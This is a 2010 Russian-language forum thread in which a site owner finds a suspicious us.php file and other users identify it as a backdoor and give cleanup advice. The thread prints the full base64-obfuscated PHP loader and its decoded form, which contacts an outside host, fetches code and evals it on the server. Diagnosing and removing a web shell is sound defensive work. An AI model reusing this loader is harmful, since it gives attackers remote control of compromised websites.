|
Кто знает, что за файл...
|
| Aehr |
Опубликовано 11-06-2010 19:31
|
Пользователь
Сообщений: 32
Зарегистрирован: 26.09.08
|
Уважаемые Знающие!
Кто знает, что за файл us.php в корне? Поиском по сайту и в Инете ничего не нашел. |
| |
|
|
| Olegat |
Опубликовано 11-06-2010 19:40
|
Пользователь
Сообщений: 473
Зарегистрирован: 01.02.06
|
У меня такого нет.
А что в файле написанно? |
| |
|
|
| Aehr |
Опубликовано 11-06-2010 19:58
|
Пользователь
Сообщений: 32
Зарегистрирован: 26.09.08
|
Одна длинная не читаемая строка.
Как ее правильно в сообщение вставить - как цитату? |
| |
|
|
| Aehr |
Опубликовано 11-06-2010 20:32
|
Пользователь
Сообщений: 32
Зарегистрирован: 26.09.08
|
В файле вот это:
 Код<?php
eval(base64_decode('aWYoaXNzZXQoJF9HRVRbJ2NoYXJrYSddKSkgew0KICAgICRzb2NrID0gQGZzb2Nrb3Blbigna20zMjAyNS5rZXltYWNoaW5lLmRlJywgODApOw0KICAgIGlmKCRzb2NrKXsNCiAgICBmd3JpdGUgKCRzb2NrLCAnR0VUIGh0dHA6Ly9rbTMyMDI1LmtleW1hY2hpbmUuZGUva29sb2JvazQvaW5kZXgucGhwP2hvc3Q9Jy4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4nJmNoYXJrYT0nLiRfR0VUWydjaGFya2EnXS4nIEhUVFAvMS4wJy4iXHJcbiIpOw0KICAgIGZ3cml0ZSAoJHNvY2ssICdIb3N0OiBrbTMyMDI1LmtleW1hY2hpbmUuZGUnLiJcclxuXHJcbiIpOw0KICAgIHdoaWxlKCRjb250ZW50W10gPSBmZ2V0cyAoJHNvY2spKTsNCiAgICAkY29udGVudCA9IGltcGxvZGUoJycsICRjb250ZW50KTsNCiAgICBAZXZhbCh0cmltKHN1YnN0cigkY29udGVudCwgc3RycG9zKCRjb250ZW50LCAiXHJcblxyXG4iKSkpKTsNCiAgICBmY2xvc2UgKCRzb2NrKTsgZXhpdDt9fQ=='));
?>
|
| |
|
|
| Alipapa |
Опубликовано 11-06-2010 21:29
|
Пользователь
Сообщений: 181
Зарегистрирован: 25.05.08
|
 PHP <?phpif(isset($_GET['charka'])) {$sock = @fsockopen('km32025.keymachine.de', 80); if($sock){ fwrite ($sock, 'GET http://km32025.keymachine.de/kolobok4/index.php?host='.$_SERVER['SERVER_NAME'].'&charka='.$_GET['charka'].' HTTP/1.0'."\r\n"); fwrite ($sock, 'Host: km32025.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock)); $content = implode('', $content); @eval(trim(substr($content, strpos($content, "\r\n\r\n")))); fclose ($sock); exit; }}?>
Вот так оно расшифровывается. А проще - вас взломали и уже знают логин и пароль к вашей базе. И могут делать с вашим сайтом всё.
Изменил(а) Alipapa, 11-06-2010 21:42 |
| |
|
|
| Alipapa |
Опубликовано 11-06-2010 21:36
|
Пользователь
Сообщений: 181
Зарегистрирован: 25.05.08
|
Файл срочно удалить. Проверить, нет ли еще левых файлов. .htaccess проверить не забудьте.
Изменил(а) Alipapa, 11-06-2010 21:44 |
| |
|
|
| Aehr |
Опубликовано 11-06-2010 21:46
|
Пользователь
Сообщений: 32
Зарегистрирован: 26.09.08
|
Спасибо!
Раньше файлы с "левыми" кодами искал по дате. А в этот раз свежих дат нет. Где искать ломаные файлы не знаю.
Перезалить файлы с дистрибутива? А моды и плагины как себя поведут?
Не знаете, почему антивирус ничего не находит в домашней директории, которую я скачал на локальный компьютер? |
| |
|
|
| admin |
Опубликовано 12-06-2010 06:10
|
Супер Администратор
Сообщений: 4424
Зарегистрирован: 05.11.04
|
Искать надо везде. И в infusions и в images и forum/attachments
На локальном компе антивирус не находит ничего, потому что шелл подгружает вирус из инета иногда. Искать надо причину заражения. Это могут быть левые файлы (щелл), или просто узнали ваши пароли. Проверьте базу данных на присутствие явакода, обычно он в таблице юзеров.
Если ничего не получается, то тогда радикальное лечение - все удалить, залить чистый дистрибут и проверять хостинг с нуля.
Какой вопрос - такой ответ! |
| |
|
|
| Aehr |
Опубликовано 12-06-2010 08:02
|
Пользователь
Сообщений: 32
Зарегистрирован: 26.09.08
|
Спасибо, начну искать.
Только вот не знаю как посмотреть наличие явакода в базе данных. В каком поле это может быть? |
| |
|
|
| admin |
Опубликовано 13-06-2010 08:55
|
Супер Администратор
Сообщений: 4424
Зарегистрирован: 05.11.04
|
Бэкапишь базу на комп, открываешь блокнотом и смотришь таблицу user
Какой вопрос - такой ответ! |
| |
|
|
| Olegat |
Опубликовано 13-06-2010 18:34
|
Пользователь
Сообщений: 473
Зарегистрирован: 01.02.06
|
Aehr написал:
Спасибо, начну искать.
Только вот не знаю как посмотреть наличие явакода в базе данных. В каком поле это может быть?
Его сразу будет видно, по нетипичности построения запроса... |
| |
|
